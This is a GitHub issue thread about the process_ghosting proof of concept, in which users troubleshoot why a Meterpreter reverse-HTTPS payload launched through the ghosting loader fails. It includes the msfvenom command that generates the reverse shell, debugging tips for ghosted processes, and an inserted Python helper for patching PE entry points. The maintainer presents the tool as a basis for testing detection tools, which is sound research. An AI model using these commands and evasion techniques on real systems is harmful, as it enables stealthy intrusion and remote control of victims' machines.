process_ghosting

Payload doesn't fire

Open hawaii67 opened this issue 4 years ago • 11 comments

I created a reverse shell with msfvenom, precisely an exe file, but it won't fire:

    E:\process_ghosting-master\Debug>proc_ghost.exe msf_rev_https.exe
    [+] Created temp file: C:\Users\fancy\AppData\Local\Temp\THCFE8.tmp
    [+] Information set
    [+] Written!
    PEB address: 2d7000
    ImageBase address: 140000000
    [+] Parameters mapped!
    PEB address: 2d7000
    PEB address: 2d7000
    ProcessParameters addr: 0000025FD11A8F30
    [+] Process created! Pid = 31e0
    EntryPoint at: 140004000
    [+] Done!

The process is created and disappears after a few seconds.

The file msf_rev_https.exe works fine btw.

hawaii67 avatar Jun 18 '21 12:06 hawaii67

so, the payload runs and terminates? or it crashes? try to debug it and see what is happening inside the payload, maybe it was not able to open a socket or so, and just exited. if it was able to run even for a moment, it means it is not an issue with the loader.

hasherezade avatar Jun 18 '21 12:06 hasherezade

The payload is just doing nothing. I tried to debug of course, but I cannot attach to the newly generated process. Error message by x64dbg:

Debugging finished! Could not get file name from module 2a10!

where 2a10 is the process id

hawaii67 avatar Jun 18 '21 14:06 hawaii67

please share the payload, and I will test what exactly is going on...

hasherezade avatar Jun 18 '21 15:06 hasherezade

Well, I just used a simple msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe to generate the payload.

PS: Trying with a GUI program as payload like winobj64.exe, it works fine. Using procexp64.exe generates an error message:

[screenshot of the error message]

So obviously the "payload" should fulfill certain criteria...

hawaii67 avatar Jun 22 '21 05:06 hawaii67

ok, so first of all, regarding the attaching to the child process:

> The payload is just doing nothing. I tried to debug of course, but I cannot attach to the newly generated process. Error message by x64dbg:
>
> Debugging finished! Could not get file name from module 2a10!
>
> where 2a10 is the process id

Indeed, in the case of this technique, as well as in Doppelganging, x64dbg does not allow attaching at this stage (before the first thread is run).

But there is a workaround for this, which helped me debug such processes:

  • you need to patch the entry point of the payload: copy two bytes that were at the beginning, and then overwrite them with EB FE (jump to the current line). Thanks to this, you can run the process, but the execution won't go any further.
  • run the payload via Ghosting/Doppelganging.
  • attach the debugger to the newly created process with the payload.
  • Break the execution.
  • Go to the Entry Point. Replace the EB FE with the original bytes that you copied in the first step. Set the breakpoint after the replaced code.
  • Resume it.

That's how you can follow the execution further.

hasherezade avatar Jun 23 '21 07:06 hasherezade
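A small analyst helper for step one of the workaround above, added here as an example and not part of the process_ghosting project: it walks the PE headers to find the file offset of AddressOfEntryPoint, saves the two original bytes, writes EB FE in their place, and can put the saved bytes back. build_sample_pe() is a constructed minimal PE32+ image used only so the code can be exercised offline; the function names are my own.

```python
import struct
JMP_SELF = b"\xEB\xFE"  # x86 "jmp $": the process spins at its entry point instead of running

def _headers(pe):
    """Return (e_lfanew, number_of_sections, section_table_offset) after sanity checks."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: MZ header or PE signature missing")
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]       # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]  # COFF SizeOfOptionalHeader
    return e_lfanew, nsec, e_lfanew + 24 + opt_size

def rva_to_offset(pe, rva):
    """Map an RVA to a raw file offset by walking the section table (40-byte entries)."""
    _, nsec, sec = _headers(pe)
    for i in range(nsec):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, sec + i * 40 + 8)
        if va <= rva < va + max(vsize, raw_size):
            return raw_ptr + (rva - va)
    raise ValueError("RVA 0x%x is not backed by any section" % rva)

def entry_point_offset(pe):
    """File offset of the entry point; AddressOfEntryPoint sits at +16 in PE32 and PE32+."""
    e_lfanew, _, _ = _headers(pe)
    ep_rva = struct.unpack_from("<I", pe, e_lfanew + 24 + 16)[0]
    return rva_to_offset(pe, ep_rva)

def patch_entry(pe):
    """Return (patched image, original two bytes) with EB FE written at the entry point."""
    off = entry_point_offset(pe)
    original = bytes(pe[off:off + 2])  # keep these: they go back in from the debugger
    out = bytearray(pe)
    out[off:off + 2] = JMP_SELF
    return bytes(out), original

def restore_entry(pe, original):
    off = entry_point_offset(pe)
    out = bytearray(pe)
    out[off:off + 2] = original
    return bytes(out)

def build_sample_pe():
    """Constructed test image: DOS stub, PE32+ headers, one .text section at raw 0x200."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x22)            # x64, 1 section
    opt = struct.pack("<HBBIIII", 0x20B, 0, 0, 0x200, 0, 0, 0x1010) + b"\0" * 220  # EP RVA 0x1010
    sec = b".text\0\0\0" + struct.pack("<IIII", 0x200, 0x1000, 0x200, 0x200) + b"\0" * 16
    code = b"\0" * 0x10 + b"\x48\x83\xEC\x28" + b"\0" * (0x200 - 0x14)     # sub rsp,0x28 at EP
    return dos + b"PE\0\0" + coff + opt + sec + b"\0" * (0x200 - 0x170) + code
```

For a real file, read it as bytes, call patch_entry(), write the patched copy for the loader, and keep the returned bytes at hand for step five in the debugger.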

> PS: Trying with a GUI program as payload like winobj64.exe, it works fine. Using procexp64.exe generates an error message:
>
> [screenshot of the error message]
>
> So obviously the "payload" should fulfill certain criteria...

This technique, as well as Doppelganging, requires manual setup of the full process environment, and setting many parameters manually: https://github.com/hasherezade/process_ghosting/blob/master/main.cpp#L158 It is quite tedious to implement, and my goal was just to make a PoC on which the detection tools can be tested, so I implemented a minimalist version, without trying to cover all the possible scenarios. It is very much possible that this will cause issues with some payloads, but currently I have other priorities and no time to dedicate to making it bulletproof. Feel free to build upon my base and extend it.

hasherezade avatar Jun 23 '21 08:06 hasherezade

Thanks for the hints and taking the time to answer. I already used the EB FE trick and I could follow the whole process in X64dbg. You are right, some parameters have to be set manually. Thanks again, especially for this great PoC.

hawaii67 avatar Jun 23 '21 08:06 hawaii67

You are welcome. When I get some free time I will look in detail at what is missing for this payload to execute completely.

BTW - check also transacted_hollowing - recently I implemented a version that is like a merge with Process Ghosting - it uses a delete-pending file instead of a transacted file.

https://github.com/hasherezade/transacted_hollowing/blob/main/main.cpp#L14

You can choose which version to build by using a CMake flag:

[screenshot: ghosting_flag]

hasherezade avatar Jun 23 '21 12:06 hasherezade

Thanks a lot, transacted_hollowing works like a charm! Awesome work !

hawaii67 avatar Jun 23 '21 17:06 hawaii67

> Thanks for the hints and taking the time to answer. I already used the EB FE trick and I could follow the whole process in X64dbg. You are right, some parameters have to be set manually. Thanks again, especially for this great PoC.

I've had the same problem, but it still can't run after I change the process information. Can you tell me which one you changed :)

knightswd avatar Aug 25 '21 16:08 knightswd

> Thanks for the hints and taking the time to answer. I already used the EB FE trick and I could follow the whole process in X64dbg. You are right, some parameters have to be set manually. Thanks again, especially for this great PoC.

I changed the RtlCreateProcessParametersEX() parameters, but it doesn't work.

knightswd avatar Aug 26 '21 02:08 knightswd